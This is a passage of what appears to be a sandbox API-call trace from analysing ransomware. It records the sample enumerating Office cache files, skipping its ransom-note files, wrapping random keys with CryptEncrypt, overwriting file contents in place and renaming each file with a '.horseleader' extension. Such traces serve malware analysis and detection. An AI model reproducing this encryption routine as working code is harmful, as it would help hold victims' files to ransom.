lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.015] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.015] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.015] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.015] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0212.016] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0212.016] CloseHandle (hObject=0x21c) returned 1 [0212.016] GetProcessHeap () returned 0x780000 [0212.016] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0212.016] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.horseleader") returned 95 [0212.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.horseleader")) returned 1 [0212.017] GetProcessHeap () 
returned 0x780000 [0212.017] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0212.017] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OfficeMUISet.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0212.017] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="Windows") returned -1 [0212.017] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0212.017] StrStrIW (lpFirst="OfficeMUISet.xml", lpSrch=".horseleader") returned 0x0 [0212.017] lstrcmpW (lpString1="OfficeMUISet.xml", lpString2="#Decrypt#.txt") returned 1 [0212.017] lstrcmpW (lpString1="OfficeMUISet.xml", lpString2="_uninstalling_.png") returned 1 [0212.017] lstrlenW (lpString=".testttjffg") returned 11 [0212.017] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", lpSrch=".testttjffg") returned 0x0 [0212.017] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0212.018] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0212.018] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0212.018] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0212.018] StrStrW (lpFirst="OfficeMUISet.xml", lpSrch=".txt") returned 0x0 [0212.018] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=819) returned 1 [0212.018] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x333, lpOverlapped=0x0) returned 1 [0212.030] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffccd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.030] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x333, lpOverlapped=0x0) returned 1 [0212.031] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.031] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0212.031] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0212.031] CloseHandle (hObject=0x21c) returned 1 [0212.032] GetProcessHeap () returned 0x780000 [0212.032] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0212.032] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.horseleader") returned 95 [0212.032] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.horseleader")) returned 1 [0212.033] GetProcessHeap () returned 0x780000 [0212.033] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0212.033] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8b16200, ftCreationTime.dwHighDateTime=0x1cac190, ftLastAccessTime.dwLowDateTime=0xc8b16200, ftLastAccessTime.dwHighDateTime=0x1cac190, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="osetupui.dll", cAlternateFileName="")) returned 1 [0212.033] lstrcmpiW (lpString1="osetupui.dll", lpString2="Windows") returned -1 [0212.033] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 79 [0212.033] StrStrIW (lpFirst="osetupui.dll", lpSrch=".horseleader") returned 0x0 [0212.033] lstrcmpW (lpString1="osetupui.dll", lpString2="#Decrypt#.txt") returned 1 [0212.033] lstrcmpW (lpString1="osetupui.dll", lpString2="_uninstalling_.png") returned 1 [0212.033] lstrlenW (lpString=".testttjffg") returned 11 [0212.034] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll", 
lpSrch=".testttjffg") returned 0x0 [0212.034] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0212.034] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0212.034] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0212.034] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 79 [0212.034] StrStrW (lpFirst="osetupui.dll", lpSrch=".txt") returned 0x0 [0212.035] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=191872) returned 1 [0212.035] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.035] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.038] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.038] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.039] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x14ec0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.039] 
ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.043] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.043] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.043] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x29d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.043] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.085] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.085] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.085] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.086] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0212.086] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, 
lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0212.086] CloseHandle (hObject=0x21c) returned 1 [0212.086] GetProcessHeap () returned 0x780000 [0212.086] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0212.086] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.horseleader") returned 91 [0212.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.horseleader")) returned 1 [0212.087] GetProcessHeap () returned 0x780000 [0212.087] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0212.087] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x77cbb000, ftCreationTime.dwHighDateTime=0x1cac57a, ftLastAccessTime.dwLowDateTime=0x77cbb000, ftLastAccessTime.dwHighDateTime=0x1cac57a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="pss10r.chm", cAlternateFileName="")) returned 1 [0212.087] lstrcmpiW (lpString1="pss10r.chm", lpString2="Windows") returned -1 [0212.087] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0212.087] StrStrIW (lpFirst="pss10r.chm", lpSrch=".horseleader") returned 0x0 [0212.087] lstrcmpW (lpString1="pss10r.chm", 
lpString2="#Decrypt#.txt") returned 1 [0212.088] lstrcmpW (lpString1="pss10r.chm", lpString2="_uninstalling_.png") returned 1 [0212.088] lstrlenW (lpString=".testttjffg") returned 11 [0212.088] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm", lpSrch=".testttjffg") returned 0x0 [0212.088] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0212.088] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0212.088] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0212.088] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0212.088] StrStrW (lpFirst="pss10r.chm", lpSrch=".txt") returned 0x0 [0212.088] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=27195) returned 1 [0212.088] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.104] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.104] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.105] ReadFile 
(in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x1a3b, lpOverlapped=0x0) returned 1 [0212.118] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffe5c5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.118] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x1a3b, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x1a3b, lpOverlapped=0x0) returned 1 [0212.118] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.119] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0212.119] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0212.119] CloseHandle (hObject=0x21c) returned 1 [0212.119] GetProcessHeap () returned 0x780000 [0212.119] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0212.119] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.horseleader") returned 89 [0212.120] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.horseleader" (normalized: "c:\\msocache\\all 
users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.horseleader")) returned 1 [0212.120] GetProcessHeap () returned 0x780000 [0212.120] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0212.120] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cab9f00, ftCreationTime.dwHighDateTime=0x1cac8ad, ftLastAccessTime.dwLowDateTime=0x7cab9f00, ftLastAccessTime.dwHighDateTime=0x1cac8ad, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10676, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="setup.chm", cAlternateFileName="")) returned 1 [0212.121] lstrcmpiW (lpString1="setup.chm", lpString2="Windows") returned -1 [0212.121] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0212.121] StrStrIW (lpFirst="setup.chm", lpSrch=".horseleader") returned 0x0 [0212.121] lstrcmpW (lpString1="setup.chm", lpString2="#Decrypt#.txt") returned 1 [0212.121] lstrcmpW (lpString1="setup.chm", lpString2="_uninstalling_.png") returned 1 [0212.121] lstrlenW (lpString=".testttjffg") returned 11 [0212.121] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm", lpSrch=".testttjffg") returned 0x0 [0212.121] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0212.121] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0212.121] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all 
users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0212.122] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0212.122] StrStrW (lpFirst="setup.chm", lpSrch=".txt") returned 0x0 [0212.122] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=67190) returned 1 [0212.122] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.122] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.155] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.156] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.156] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x5b3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.156] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.176] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.178] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, 
lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.178] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb676, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.179] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.179] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.179] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.179] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.179] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0212.179] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0212.180] CloseHandle (hObject=0x21c) returned 1 [0212.180] GetProcessHeap () returned 0x780000 [0212.180] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0212.180] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.horseleader") returned 88 [0212.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All 
